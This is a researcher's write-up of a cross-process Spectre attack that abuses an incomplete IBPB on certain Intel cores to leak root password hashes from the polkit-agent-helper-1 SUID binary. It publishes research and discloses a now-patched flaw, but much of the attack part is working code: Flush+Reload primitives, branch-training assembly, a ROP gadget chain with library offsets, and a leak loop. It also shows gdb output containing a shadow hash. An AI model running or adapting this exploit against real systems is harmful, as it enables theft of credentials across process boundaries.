Cross-Process Spectre Exploitation

By Johannes Wikner

October 18, 2024

I will walk through a cross-process Spectre attack I developed, partly while interning at Open Source Security, Inc.

Cross-Process Spectre

I have developed an exploit to demonstrate the impact of an incomplete Indirect Branch Prediction Barrier (IBPB) in Intel Golden Cove and Raptor Cove that I discovered. IBPB is meant to invalidate all indirect branch target predictions, which includes returns and jump/call instructions that take a memory or register operand (i.e., indirect branches). However, due to buggy microcode -- which appears to be an emergent problem in modern processors -- certain return target predictions are retained across IBPBs.

Back at ETH, Kaveh and I wrote a paper on this matter that we're publishing today along with this write-up. In the paper we also exploited a semantics issue of IBPB on certain AMD parts, leading to privileged memory disclosure on systems using IBPB-on-entry, which ironically is meant to be the more comprehensive mitigation alternative to the suspicious-looking, software-based SafeRET and retbleed thunk mitigations. In this write-up I will focus on the cross-process exploit, which is special for a couple of reasons.

  1. AFAIK, this is the first end-to-end cross-process Spectre exploit that does not exploit fake toy-programs.
  2. The overwhelming majority of software authors are unconcerned about cross-process Spectre attacks, indicated by the fact that none of them enable IBPB. The only exception I've seen is Google Chrome.

Unlike OS-kernels, which are packed with 1000s of lines of code to select the appropriate mitigations to fend off cross-privilege Spectre attacks, user programs do nothing --- even if they run as root and manage sensitive information (e.g., OpenSSH, sudo, polkit). With this work, I hope to convince software authors of such programs to use IBPB. However, even if they did use IBPB, they would have been vulnerable to the attack I'll explain anyway. Intel has patched the IBPB issue in a microcode update released earlier this year, so now they would be safe.

What IBPB?

Branch prediction state shared across processes running on the same core. While predictions may be restricted to the sibling thread and privilege domain they belong to, programs running in the same thread and privilege domain can influence each other's speculative control flow. To prevent this, IBPB should be used. IBPB is trigged from the privileged domain with a Model-Specific Register (MSR) write:

    movq   $0x49, %rcx ; MSR_IA32_PRED_CMD
    movq   $1, %rax    ; PRED_CMD_IBPB
    xor    %rdx, %rdx
    wrmsr

User programs can enable this via the prctl() ABI. Besides user programs, hypervisors like KVM will unconditionally use IBPB when switching vCPUs. It is also likely -- however I didn't test it, and it is not explicitly documented -- that transitioning to SGX enclaves and to SMM imposes an implicit IBPB as well.

Before delving deeper, we'll cover some additional background on Spectre attacks.

How Spectre mis-speculations are exploited

Most of us are aware of at least some of the various Spectre vulnerabilities that modern processors are susceptible to. In a Spectre attack, the goal of the attacker is to leak unauthorized data by combining transient execution of incorrect control flow, caused by a branch misprediction, with side-channel analysis.

Branch misprediction

Branch prediction concerns conditional branch directions (e.g., taken vs. fall-through) and branch target addresses stored in microarchitectural core-local table-like datastructures. Our focus is on branch target address predictions. Intel processors are known to store these in Branch Target Buffers (BTBs) and TAGE-table-like structures. We do not need to understand how these work exactly. However, for a mental picture, I show an illustration of my own view below. Details about Intel's TAGE configuration I copied from the recent indirector paper. (I am not claiming that this resembles any actual implementations, but works for the purpose of this write-up)

IP[23:0]----------+
                  |
       +----------v--------------+
       | BTB                     |
       |-------------------------|
Set 0  | Entry0 | ... | Entry 11 |      +---------------------------------------------+
Set 1  | Entry0 | ... | Entry 11-+----->| BTB entry                                   |
Set .. |                         |      |---------------------------------------------|
Set 1K | Entry0 | ... | Entry 11 |      | 8bit | 1bit   | 2bit | 2bit | 1bit | 32bit  |
       +-------------------------+      | TAG  | THREAD | PL   | TYPE | OF   | TARGET |
                                        +--------------------------|------------------+
           +-----------------+--------------------+----------------+
           |                 |                    |                |
        "RETURN"    ,--> "INDIRECT"    ,-----> "DIRECT" <-,   "CONDITIONAL"
           |        |        |   no-path-correl.  |       |        |
        +-----+   "RSBA"     v         |          v     Taken      v
        | RSB |-----'      "TAGE"------'        TARGET    '------ PHT
        +-----+             VVVV

IP[15:6]---------+-----------------------+----------------------+
                 |                       |                      |
             BHB[67:0]               BHB[131:0]             BHB[387:0]
                 |                       |                      |
        +--------v--------+     +--------v--------+     +-------v---------+
        | TAGE1           |     | TAGE2           |     | TAGE2           |
        |-----------------|     |-----------------|     |-----------------|
Set  0  | Entry0 | Entry1 |     | Entry0 | Entry1 |     | Entry0 | Entry1 |
Set  1  | Entry0 | Entry1 |     | Entry0 | Entry1 |     | Entry0 | Entry1 |
Set ..  |      ....       |     |      ....       |     |      ....       |
Set 512 | Entry0 | Entry1 |     | Entry0 | Entry1 |     | Entry0 | Entry1 |
        +----|------------+     +-----------------+     +-----------------+
             |                                                   ^
             |                              194 branches hist----'
             |
  +----------v------------+
  | TAGE entry            |
  |-----------------------|
  | 10bit | 48bit  | 2bit |
  | TAG   | TARGET | PL   |
  +-----------------------+

The BTB is a set-associative buffer that is indexed by the current Instruction Pointer (IP), where each BTB-entry contains a static target and a type. If the type is INDIRECT, the (indirect) branch target prediction is in fact dynamic and depends on the path-history. If the type is RETURN, we should receive the branch target from the Return Stack Buffer (RSB), which records the upcoming return address for every encountered call instruction. Storing branch type information within the BTB allows the processor prepare a prediction ahead of time, before instruction decode of its branch source has completed, which can lead to Phantom speculation, which SRSO exploits.

For indirect branch target prediction, the BTB becomes the 0th-level "tagless" TAGE table that is used when there is no correlation between path history and the branch. Otherwise, we will also consider the branch targets from higher-level TAGE-tables, picking the target that correlates with the longest path-history. Intel refers to this path-history as a Branch History Buffer (BHB). If the current BHB does not correlate with prediction in the TAGE tables, we fallback to the static target of the BTB.

For return target prediction, the BTB and TAGE entries may also become relevant should the RSB not reference a valid target, for example because the RSB is empty. If so, Intel's "bottom-less" RSB instead uses an alternate prediction scheme (RSBA), which essentially means treating the BTB entry of the return as if it had type INDIRECT. For this to work, every time a return is executed, it does not only update the RSB-state, but it also updates the indirect branch predictor with return targets.

Additional information needs to be stored like the privilege level PL, the hardware thread THREAD, and an overflow bit OF, to determine if a direct branch target crosses a 4 GiB boundary. I also imagine that information of whether the branch is a CALL might be recorded for faster RSB updates.

Side-channel analysis

What we most commonly see in Spectre attacks is that the attacker forces the victim to make a misprediction to transiently access unauthorized memory ("secrets") and use these in subsequent "secret"-dependent operations. The attacker can deduce the secret via a Flush+Reload (F+R) side channel. F+R is a comparably fast and low-noise side channel, but relies on memory sharing between the attacker and the victim. That is usually not a concern however. For example, all user memory is shared with the kernel via physmap, and user memory of non-writable sections of shared libraries are shared across all processes using the library (so you don't need to keep 1000 copies of glibc in memory for every running program ;))

Flush+Reload

Here is an F+R example. We introduce a "reloadbuffer" RB, that contains a number of "entries" that will be flushed and reloaded while measuring their access times, reveling if the memory was fetched after it was flushed. Each entry has a corresponding bin in a histogram RB_HIST. When reloading, if there is a cache hit for a particular entry (deduced by its access time), the respective bin increments.

#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <err.h>

/* it's generally better to hardcode hit/miss threshold than to compute it:
 * 1. threshold becomes an immediate
 * 2. calibrating requires a warmup to get stable value => slow.
 * The following should detect LLC misses on all microarchs. */
#ifndef CACHE_MISS_THRES
#define CACHE_MISS_THRES 150
#endif

#ifndef RB_PTR
/* The Reload Buffel "RB" will take a hardcoded address so that it unlikely
 * neighboring other data */
#define RB_PTR 0x13200000UL
#endif
#ifndef RB_STRIDE
/* Each cache line that we flush+reload is separated by 4096 bytes. Smaller
 * strides are possible, but increases the chance of data cache prefetching =>
 * noisy results.
 */
#define RB_STRIDE (1UL<<12)
#endif
#ifndef RB_SLOTS
/* If we're just testing if a side channel works, we are fine with just a few
 * entries. To leak full bytes we would need 256 entries. */
#define RB_SLOTS 8
#endif
#ifndef SECRET
/* If we're just testing if a side channel works, we can aim at leaking a
 * pre-determined "secret" value. */
#define SECRET 6
#endif
#ifndef RB_OFFSET
/* Rather than reloading a page-aligned address, we can pick something else.
 * The first few CLs of a page are more likely prefetched than others. */
#define RB_OFFSET 0x180
#endif
#ifndef RB_HIST
/* We keep the results in a histogram with RB_SLOTS bins. We give it a fixed
 * address too to make the reloading code position independent. */
#define RB_HIST 0x1800000
#endif

#ifndef mb
/* Wait for all memory operations to complete before continuing. */
#define mb() asm("mfence" ::: "memory");
#endif

typedef unsigned long u64;
typedef unsigned int u32;
typedef unsigned char u8;

/* Start measure */
static __always_inline u64 rdtsc(void) {
    unsigned lo, hi;
    asm volatile ("lfence\n\t"
            "rdtsc\n\t"
            : "=d" (hi), "=a" (lo));
    return ((u64)hi << 32) | lo;
}

/* Stop measure */
static __always_inline u64 rdtscp(void) {
    unsigned lo, hi;
    asm volatile("rdtscp\n\t"
            "lfence\n\t" : "=d" (hi), "=a" (lo)
            :: "ecx");
    return ((u64)hi << 32) | lo;
}

/**
 * Reload the n cache lines used for flush+reload. If access time is below the
 * threshold, increment the respective counter for the histogram/results.
 */
static __always_inline void reload_range(long base, long stride, int n, u64 *results) {
    mb();
    /* unroll the loop to avoid triggering data cache prefetcher. */
#pragma clang loop unroll(full)
    for (u64 k = 0; k < n; ++k) {
        /* semi-randomize the reload-order to avoid triggering data cache prefetcher */
        u64 c = (k*7+5)&(n-1);
        unsigned volatile char *p = (u8 *)base + (stride * c);
        u64 t0 = rdtsc();
        *(volatile unsigned char *)p;
        u64 dt = rdtscp() - t0;
        if (dt < CACHE_MISS_THRES) results[c]++;
    }
}

/**
 * Flush all the cachelines used for flush+reload.
 */
static __always_inline void flush_range(long start, long stride, int n) {
    mb();
    for (u64 k = 0; k < n; ++k) {
        volatile void *p = (u8 *)start + k * stride;
        asm volatile("clflushopt %0\n" ::"m"(*(const char *) p));
    }
}

static u8* rb = (u8 *)RB_PTR;
static u64 *rb_hist = (u64 *)RB_HIST;

#define ROUND_2MB_UP(x) (((x) + 0x1fffffUL) & ~0x1fffffUL)

/* Prefer huge pages for the reloadbuffer => less noise. */
#define RB_SZ ROUND_2MB_UP((RB_SLOTS * RB_STRIDE) + 0x1000UL)
#define MMAP_FLAGS (MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED_NOREPLACE)

/**
 * Convenience macros.
 */
#define rb_reset() memset(rb_hist, 0, RB_SLOTS * sizeof(*rb_hist))
#define rb_flush() flush_range(RB_PTR+RB_OFFSET, RB_STRIDE, RB_SLOTS);
#define rb_reload() reload_range(RB_PTR+RB_OFFSET, RB_STRIDE, RB_SLOTS, rb_hist);

/**
 * Initialize flush+reload buffer referenced by (RB_PTR) and the results
 * (RB_HIST).
 */
static void rb_init() {
    /* Histogram, or simply put, the results. */
    if (mmap((void *)RB_HIST, RB_SLOTS*sizeof(u64), PROT_READ | PROT_WRITE, MMAP_FLAGS|MAP_POPULATE, -1, 0) == MAP_FAILED) {
        err(1, "rb_hist");
    }
    if (mmap((void *)RB_PTR, RB_SZ, PROT_READ | PROT_WRITE, MMAP_FLAGS, -1, 0) == MAP_FAILED) {
        err(1, "rb");
    }

    /* Try to make this page a single 2MB page, to avoid TLB missing when
     * reloading. */
    madvise((void *)RB_PTR, RB_SZ, MADV_HUGEPAGE);
    memset((void *)RB_PTR, 0xcc, RB_SZ); /* Make sure it isn't zero-page backed*/
}

#define ROUNDS 1000
int main(void) {
    rb_init();
    rb_flush();
    rb_reset();
    for (int i = 0; i < ROUNDS; ++i) {
        rb_flush();
        mb();
        // touch something.
        *(u8*) (RB_PTR+RB_OFFSET+SECRET*RB_STRIDE) = 12;
        mb();
        // we will be able to deduce what entry was touched.
        rb_reload();
    }
    // print each bin.
    for (int i = 0; i < RB_SLOTS; ++i) {
        printf("%04ld ", rb_hist[i]);
    }
    printf("\n");
    return 0;
}

The code should be compiled with clang, with optimizations enabled. Running it will result in the entry index defined by SECRET getting hot.

clang -Og -DSECRET=6 ./ex1.c -o ex1 && ./ex1
# > 0000 0000 0000 0000 0000 0000 1000 0000

clang -Og -DSECRET=4 ./ex1.c -o ex1 && ./ex1
# > 0000 0000 0000 0000 0999 0000 0000 0000

See how the results turn noisier if we for example reduce the stride and increase the number of entries (nb. must still be a power of 2).

clang -Og -DRB_SLOTS=32 -DRB_STRIDE=128L ./ex1.c -o ex1 && ./ex1
# > 0000 0000 0003 0002 0002 0000 0999 0000 0000 0001 0000 0000 0000 0000 0000 0000 0000 0000 0001 0000 0001 0001 0000 0001 0001 0000 0000 0001 0000 0000 0000 0000

Comparing the signal of the expected-hot entry with the other entries lets us infer how noisy the measurement is, and it lets us detect bugs. For example, if we forget the optimizations we would immediately see that something is not right.

clang ./ex1.c -o ex1 && ./ex1
# > 0999 1000 0996 0999 0125 0000 1000 0000

We will use F+R to observe indirect branch target misprediction.

Observe indirect branch misprediction

There is a key-difference between path-history-based and IP-based indirect branch target prediction. The IP-based one is using the BTB, which only has the lower 32 bits of the target. We can observe this with a simple F+R experiment.

Consider the following four snippets.

/* training branch source */
mk_snip(tr_src,
    "mov $" STR(RB_PTR) ", %rax;"
    "clflush (%rdi);"
    "mfence        ;"
#ifdef USE_RET
    "push (%rdi)   ;"
    "ret           ;"
#else
    "jmp *(%rdi)   ;"
#endif
);

/* victim branch source */
mk_snip(vi_src,
    "mov $" STR(RB_PTR) ", %rax;"
    "clflush (%rdi);"
    "mfence        ;"
#ifdef USE_RET
    "push (%rdi)   ;"
    "ret           ;"
#else
    "jmp *(%rdi)   ;"
#endif
);

/* This one will never execute */
mk_snip(tr_dst_IP,
    /* signals "2", assumes RB_PTR in rax */
    "mov " STR(RB_OFFSET + RB_STRIDE * 2)"(%rax), %rax;"
    "lfence;"
    "ret;"
);

mk_snip(tr_dst_BHB,
    /* signals "4", assumes RB_PTR in rax */
    "mov " STR(RB_OFFSET + RB_STRIDE * 4)"(%rax), %rax;"
    "lfence;"
    "ret;"
);

We assign these snippets the following code pointers.

init_snip(&tr_src_desc,     0x10000000000, tr_src);
/*                                v- bit 24 */
init_snip(&vi_src_desc,     0x01001000000, vi_src);
/*                               v-- bit 32  */
init_snip(&tr_dst_BHB_desc, 0x10020000000, tr_dst_BHB); /* Near the tr_src */
init_snip(&tr_dst_IP_desc,  0x01020000000, tr_dst_IP);  /* Near the vi_src */

The BTB on Golden Cove and Raptor Cove only uses the lower 24 bits to address the BTB. Hence, tr_src and vi_src resolve to the same BTB set and tag (i.e., aliasing). After we execute tr_src with a pointer to tr_dst_BHB in rdi, a new prediction is created. The BTB however only contains the lower 32 bits of the target, while the full target is stored in the TAGE tables. So the question is: after training tr_src with tr_dst_BHB as target, will tr_dst_BHB or tr_dst_IP be predicted when we execute vi_src?

Assuming the path-history leading up to vi_src was different, maybe we it predict tr_dst_IP, once. However, the next time it will recognize the mistake and avoid repeating it. To make it consistently mispredict tr_dst_IP or tr_dst_BHB, we need to introduce path-history.

#define OP_RET 0xc3
#define BHB_AREA 0x4400000000L

static void init_bhb_area() {
    if (mmap((void *)BHB_AREA, 1L<<24, PROT_READ|PROT_WRITE|PROT_EXEC, MMAP_FLAGS, -1, 0) == MAP_FAILED) {
        err(1, "bhb_area");
    }
}

static void random_bhb(u64 *bhb, int n) {
    for (int i = 0; i < n; ++i) {
        // some random sequence of return branches in the BHB_AREA
        bhb[i] = BHB_AREA + (random()%(1L<<24));
        *(u8 *) bhb[i] = OP_RET;
    }
}

#define BHB_LEN 195

static u64 bhb[BHB_LEN];
static code_snip_t tr_src_desc, vi_src_desc, tr_dst_BHB_desc, tr_dst_IP_desc;
static int main(void) {
    init_bhb_area();
    srandom(getpid());
    random_bhb(bhb, BHB_LEN);

    init_snip(&tr_src_desc,     0x10000000000, tr_src);
    init_snip(&tr_dst_BHB_desc, 0x10020000000, tr_dst_BHB);
    init_snip(&vi_src_desc,     0x01001000000, vi_src);
    init_snip(&tr_dst_IP_desc,  0x01020000000, tr_dst_IP);

    #define ROUNDS 1000
    for (int i = 0; i < ROUNDS; ++i) {
        /* train */
        asm(
            "lea 33f(%%rip), %%rax ;" /* return address after training */
            "push %%rax            ;"
            "push %1               ;" /* training source */
            "mov %0, %%rbx         ;" /* add the branch history*/
            ".rept " STR(BHB_LEN) ";"
            "  push (%%rbx)        ;"
            "  add $8, %%rbx       ;"
            ".endr                 ;"
            "ret                   ;" /* go through BHB, then branch source */
            "33:                   ;"
            :: "r"(bhb), "r"(tr_src_desc.ptr), "D"(&tr_dst_BHB_desc.ptr) : "rax", "rbx");
        rb_flush();

        /* DO STUFF HERE */

        /* run victim */
        asm(
            "lea 33f(%%rip), %%rax ;"
            "push %%rax            ;" 
            "mov %%rsp, %%rdi      ;" /* vi_src will take us right back to "33:" */
            "push %1               ;"
            "mov %0, %%rbx         ;"
            ".rept " STR(BHB_LEN) ";"
            "  push (%%rbx)        ;"
            "  add $8, %%rbx       ;"
            ".endr                 ;"
            "ret                   ;"
            "33:                   ;"
            "add $8, %%rsp         ;" /* re-adjust stack */
            :: "r"(bhb), "r"(vi_src_desc.ptr): "rdi", "rax", "rbx");
        rb_reload();
    }
    rb_print();
    return 0;
}

If we run this, we get:

0000 0000 0000 0000 1000 0000 0000 0000 # jmp*, matching bhb

Unsurprisingly, thanks to the matching path-history leading up to vi_src and tr_src, vi_src mispredicts tr_dst_BHB. If we instead randomize the BHB before we run vi_src, for example by inserting random_bhb(bhb, BHB_LEN); before /* run victim */, we get instead:

0000 0000 0930 0000 0001 0000 0000 0000 # jmp*, randomized bhb

So the misprediction now took tr_dst_IP -- which is funny, because we never executed that code in the program. We can now do the same thing with USE_RET set to use returns and get.

0000 0000 0000 0000 0979 0000 0000 0000 # ret, matching bhb
0000 0000 0324 0000 0000 0000 0000 0000 # ret, randomized bhb

So we get the same result, but with a bit weaker signal. Many of you might find it strange to see what appears to be indirect branch target predictions on top of returns. However, this is an Intel feature that has many names, such as "bottom-less RSB", "RSBA", "RRSBA". Return Stack Buffer Alternate (RSBA) occurs when the RSB is empty. Because of our long path-history, consisting only of returns, the RSB is guaranteed empty when we hit the victim branch, hence we get RSBA. To be precise, we on eIBRS systems, we call it Restricted RSBA (RRSBA) since the alternate predictions (not the RSB predictions) are protected by eIBRS (they are indirect branch predictions after all).

Bring in IBPB

The next thing to now is to test how well IBPB works. There's a super easy way (thanks to bsdaemon ;)) to trigger IBPB in Linux 6.2+, we can just do

prctl(PR_SET_SPECULATION_CTRL, PR_SPEC_INDIRECT_BRANCH, PR_SPEC_FORCE_DISABLE, 0, 0);

I was on an Ubuntu 5.15.0-97-generic while doing this work, so I did same using a kernel module instead. Now, if we have an IBPB after training and test vi_src for (1) path-based and (2) ip-based predictions for (a) indirect branch and (b) return, we get something unexpected.

0000 0000 0000 0000 0000 0000 0000 0000 # ibpb, jmp*, (1,a)
0000 0000 0000 0000 0000 0000 0000 0000 # ibpb, ret,  (1,b)
0000 0000 0000 0000 0000 0000 0000 0000 # ibpb, jmp*, (2,a)
0000 0000 0155 0000 0000 0000 0000 0000 # ibpb, ret,  (2,b)

We are still getting signal tr_dst_IP, post IBPB! It took a while to conclude that this was not a software bug. In fact, this is a microcode bug! The prediction is retained across the IBPB. But what should we do with this interesting effect?

Build a cross-process Spectre leak

Two things that IBPB is used for are context switches and vCPU switches. While it would be cool (and certainly not impossible) to leak information from a co-tenant VM with this primitive, it appears easier to prove the impact of the vulnerability by targeting context switches between processes.

The funny thing is however that nobody appears to have built a real cross-process Spectre attack in the past. So in order to prove that IBPB bugs are a real problem, we must first build cross-process Spectre exploit. One that IBPB should protect against.

Another funny thing is that the only victim candidate I found that was using IBPB was Google Chrome. But we are already deep down in a mess, and descending deeper, into javascript hell, would not do my sanity well.

Instead we will target a SUID program that lets you authenticate as root via a password prompt. After a bit of poking around, I decided that polkit appeared to be a perfect victim, specifically the /usr/libexec/polkit-agent-helper-1 that is present on most Linux machines.

polkit-agent-helper-1 is not meant to be run by humans, but reading its source code shows that it takes two arguments: the user to authenticate as (we will use root, of course) and a "cookie", which we don't really care about. Secondly, stdin must be anything but a tty for it to work. So we can run it like:

while true; sleep 2; do echo -n A; done | /usr/libexec/polkit-agent-helper-1 root asdfadsf
# > PAM_PROMPT_ECHO_OFF Password:

Since the attacker can obtain of the same binaries and libraries as the vicitm (e.g. via apt repos), they can debug this program with full privileges locally. So I run strace on it:

while true; sleep 2; do echo -n A; done | sudo strace -eopenat,read /usr/libexec/polkit-agent-helper-1 root asdfadsf
# > read(3, "root:x:0:0:root:/root:/bin/bash\n"..., 4096) = 2669
# > openat(AT_FDCWD, "/etc/shadow", O_RDONLY|O_CLOEXEC) = 3
# > read(3, "root:$6$HGU6y/YF5$rf5na/CbCxzKWR"..., 4096) = 1651
# > PAM_PROMPT_ECHO_OFF Password:
# > read(0, "A", 4096)                      = 1
# > read(0, "A", 4096)                      = 1
# > read(0, "A", 4096)                      = 1
# > read(0, ^Cstrace: Process 334359 detached
# >  <detached ...>

This is fantastic weird at the same time! It reads the password hashes from /etc/shadow before even taking the password. It appears that libpam, which manages the authentication, does this to check that the password is valid and hasn't expired. It also stores the password hash in memory inside the pam context.

We want to hijack a return in this process by first training it in our attacker process, then trigger the victim process to run by sending a character to its stdin.

To figure out which ones are available, we can use Intel PT (via perf) to create a --call-ret trace. I traced all calls and rets between my process, who sent a character to the victim and gone idle, through the kernel and into and the victim who is receiving it. There are three returns, all in glibc of the victim, that could be exploited if predicted with RRSBA: read, _IO_file_underflow, and _IO_default_uflow. Unfortunately, they are not predicted with RSBA, because the call-depth imposed by read in the victim is too shallow. However, the victim accepts any kind of stdin, except a tty. So instead of attaching a normal pipe to interact with the victim's stdin, we can attach a socket. Because sockets are much more complicated to read from, the read call-depth of the victim now exceeds the RSB capacity, leading to exploitable RRSBA-predicted returns for all three returns.

We take a look at _IO_default_uflow in gdb and we what find is surprising!

Breakpoint 1, 0x00007ffff7c46db0 in __GI__IO_default_uflow (fp=<optimized out>) at ./libio/genops.c:366
366     ./libio/genops.c: No such file or directory.
   0x00007ffff7c46daf <__GI__IO_default_uflow+79>:      5d      pop    %rbp
=> 0x00007ffff7c46db0 <__GI__IO_default_uflow+80>:      c3      ret
   0x00007ffff7c46db1 <__GI__IO_default_uflow+81>:      0f 1f 80 00 00 00 00    nopl   0x0(%rax)
(gdb) i r
rax            0x41                65
rbx            0x0                 0
rcx            0x7ffff7ccd7e2      140737350784994
rdx            0x555555596301      93824992502529
rsi            0x555555596300      93824992502528
rdi            0x0                 0
rbp            0xa                 0xa
rsp            0x7fffffffe148      0x7fffffffe148
r8             0x0                 0
r9             0x555555596300      93824992502528
r10            0x7ffff7dd4270      140737351860848
r11            0x246               582
r12            0x7ffff7dd3aa0      140737351858848
r13            0x0                 0
r14            0x7fffffffe1f0      140737488347632
r15            0x1ff               511
rip            0x7ffff7c46db0      0x7ffff7c46db0 <__GI__IO_default_uflow+80>
eflags         0x202               [ IF ]
cs             0x33                51
ss             0x2b                43
ds             0x0                 0
es             0x0                 0
fs             0x0                 0
gs             0x0                 0
(gdb) x/s $rsi
0x555555596300: "Aoot:$6$HGU6y/YF5$rf5na/CbCxzKWRjrkPYDb1oN5ZI7TSxVs8Epz79q9jUyZnIqmmIGYd4lzOVa8I4yyGQ2SSjyd0op5mujCdX4Q.:19755:0:99999:7:::\ndaemon:*:19235:0:99999:7:::\nbin:*:19235:0:99999:7:::\nsys:*:19235:0:99999:7::"...

As we're reading entered characters from the password prompt, the stream buffer that stdin receives password input onto (here 'A') already references the secret that we want to leak, and it's referenced by three different registers! Even better, the last entered character sits in rax, which can act as an index to target a specific byte of the secret. How did that happen?

Because the password hashes were read right before presenting the password prompt, the most recently freed memory was the stream buffer of the file handle for /etc/shadow. When we immediate allocate a new stream buffer for stdin, which is of the same size as the previous one, malloc recycles that memory. So the memory that rsi, rdx, and rsi reference is in fact simply uninitialized memory that happened to have held secrets just before.

But how should we leak the secret?

Gadget chain

We know that we can hijack a return and make it speculatively execute a target of our choice in the victim's address space. The speculated target needs to read a byte of the secret using rax as index. Then we need to transmit it to the attacker over a F+R side channel. Because read-only sections of shared libraries are shared in physical memory, the idea to use the executable section of glibc, referenced by rcx and rip, as the "reloadbuffer". So we want to make a secret-dependent memory access to rcx or rip, so that we can later deduce the secret in the attacker's process.

I realized that this is not going to be easy to find in one single piece of code in the victim that reads and leaks bytes the secrets. However, maybe it is possible to stitch together a chain of gadget that does one of each necessary operation and trigger a series of nested return mispredictions to speculatively execute all of them. At this point, I was mildly exhausted, so I reached out to the very encouraging and enthusiastic security folks at Google. They told me that they would be happy to find me a ROP-gadget chain -- they are a search company after all! Indeed, a few days later Chani Jindal sent me a perfectly looking gadget chain:

0x7ffff68efa69: movzx eax, byte [rax+rdx] ; ret ; (/usr/lib/x86_64-linux-gnu/libicuuc.so.70.1)
0x7ffff7cef5b7: rol eax, 0x08 ; ret             ; (/usr/lib/x86_64-linux-gnu/libc.so.6)
0x7ffff75f45ec: shl rax, 0x02 ; ret             ; (/usr/lib/x86_64-linux-gnu/libzstd.so.1.4.8)
0x7ffff73af74b: mov al, byte [rcx+rax] ; ret    ; (/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4)

The first one reads a byte of the secret using the attacker-controllable rax as index, with zero-extension so the rest of rax gets zapped. The secret then gets left-rotated 8 times and left-shifted another 2 times and finally used as index in a memory load of rcx.

Exploit!

The procedure works as follows. The attacker forks a new process and pins it and itself to the same hardware thread and spawn the victim program. Sharing hardware thread allows the attacker and victim share branch prediction and cache state. The attacker attaches a socket to the stdin of the victim and waits for the password prompt. To train the gadget chain in the victim, we just execute construct a ROP-gadget chain as aliasing addresses made up of NOPs and RETs.


#define LIBC_AX         0x7ffff7be0000
#define LIBICUUC_AX     0x7ffff68eb000
#define LIBZSTD_AX      0x7ffff75ee000
#define LIBPCRE2_8_AX   0x7ffff73ad000

#define GADGET(start, size)       \
    {                             \
        start, start + (size - 1) \
    }

static struct bhb_bb bhb_path_b[] = {
    // __GI__IO_default_uflow
    GADGET(LIBC_AX     + 0x065d96, 27), //
    // movzbl (%rax,%rdx,1),%eax ; ret \x0F\xB6\x04\x10\xC3
    GADGET(LIBICUUC_AX + 0x005a69, 5),
    //  rol $8, %eax; ret \xC1\xC0\x08\xc3
    GADGET(LIBC_AX     + 0x10e5b7, 4),
    // shl $2, %rax ; ret \x48\xC1\xE0\x02\xc3
    GADGET(LIBZSTD_AX  + 0x45ec, 5),
    // mov (%rcx,%rax,1), %al ; ret \x8A\x04\x01\xC3
    GADGET(LIBPCRE2_8_AX + 0x74b, 4)
};

#define BHB_B_LEN (sizeof(bhb_path_b) / sizeof(*bhb_path_b))
void init_gadgetchain(long off)
{
    for (int i = 0; i < BHB_B_LEN; ++i) {
        struct bhb_bb *bb = &bhb_path_b[i];
        memset(_ptr(F(bb->start_adr - off)), 0x90, bb_len(bb));
        memcpy(_ptr(F(bb->end_adr - off)), "\xc3", 1);
    }
}

void train_gadgetchain(u64 off)
{
    static long bbstack[6];
    for (int i = 0; i < BHB_B_LEN; ++i) {
        bbstack[i] = F(bhb_path_b[i].start_adr - off);
    }
    void finland();
    bbstack[BHB_B_LEN] = (long)finland;
    bbstack[0] = F(bhb_path_b[0].start_adr - off);
    asm("mov    %%rsp, %%r15  \n"
        "lea    8(%0), %%rsp  \n"
        "jmp    *(%0)         \n"
        "finland:             \n" /* come back here */
        "mov    %%r15, %%rsp  \n" ::"r"(bbstack)
        : "r15", "rax", "memory");
}

To trigger with the victim, we send a byte to it corresponding to the byte offset we want to leak of the secret.

static struct timespec req = {0,0};

int runsu_poke(child_proc_t *child, char c) {
    int ret = write(child->input, &c, 1);
    clock_nanosleep(CLOCK_REALTIME, 0, req, NULL);
    return ret;
}

The condensed procedure becomes something similar to:

static const u64 rb_start = (u64)read + 18; /* rcx in victim points to read<+18> */
for (int sec_idx = 1; sec_idx < 110; ++sec_idx) {
    while (guess == -1) {
        train_gadgetchain(off);
        flush_range(rb_start, RB_STRIDE, RB_SLOTS);
        runsu_poke(runsu, sec_idx-1);
        reload_range(rb_start, RB_STRIDE, RB_SLOTS, results);
        for (int i = 1; i < RB_SLOTS; ++i) {
            if (results[i] > 1) {
                guess = i;
                break;
            }
        }
    }
    secret[sec_idx] = guess;
}

Does this work? Not at all! First of all, we have to win a race condition. We need to have enough time to execute the entire gadget chain, before the real return target comes back from the program stack. I was stuck as this point for an awful long time. I attempted evicting the program stack from a sibling thread, however it didn't work. I attempted to prefetch the code of the respective gadgets by targeting preceding returns, which also did not work. Because the shl gadget is not strictly necessary, I removed it.

Because the results were extremely noisy, rather than flushing and reloading an entire range, I tried to only flush and reload a single entry, matching the 'o' of 'root' in the password hash. If any of the tweaking would work, it should be able to detect this byte.

To slow down the victim, I introduced random memory noise from a victim thread by simply running an old stress test tool stress -m 1. I would occasionally see what appeared to be signal from the 'o' in this way. However, the results were still noisy. It appeared that certain instance of the victim process were more noisy than others and those instances wouldn't be able to leak anything. So I would test each victim instance if it was able to leak 'o' before I would use it. This way, I was able to leak information -- however at an incredibly low speed! But that is a different problem, we only wanted to conclude that it works!

Behold: https://www.youtube.com/watch?v=VYEVcj-vnbs

What about ASLR?

I skipped this for brevity. However, we do derandomize ASLR, and incredibly efficiently too! We derandomize the lower 32 bits of the address space, which is sufficient: we only need the lower 24 bits to hijack a particular branch, and only the lower 32 bits are recorded in the BTB prediction anyway. To derandomize, we use a "reversed" branch target injection attack, in the sense that we let the victim train a branch in the attacker process. The attacker then guesses around until it finds a branch that gets predicted with a prediction from the victim, thereby learning about its address space layout. For details on the ASLR exploit, I refer you to the paper.